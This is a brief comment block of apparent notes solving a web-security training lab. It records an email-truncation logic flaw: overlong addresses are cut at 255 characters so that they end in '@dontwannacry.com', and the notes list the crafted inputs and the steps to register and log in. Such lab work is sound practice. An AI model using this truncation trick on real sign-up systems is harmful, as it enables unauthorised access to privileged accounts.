/*



main point behind logic flaws is to reach the limits imposed on data.
1) emailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailid@dontwannacry.com.exploit-0a8e008d04014fbe80230cb3012d002b.exploit-server.net
//enter this email id

2) emailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailid@dontwannacry.com.exploit-0a8e008d04014fbe80230cb3012d002b.exploit-server.net
//enter this email id
//login after successful registration
//emailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidema
//only 255 characters are kept in an emailid storage variable

3) Enter this one now
//emailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailidemailid@dontwannacry.com.exploit-0a8e008d04014fbe80230cb3012d002b.exploit-server.net

*/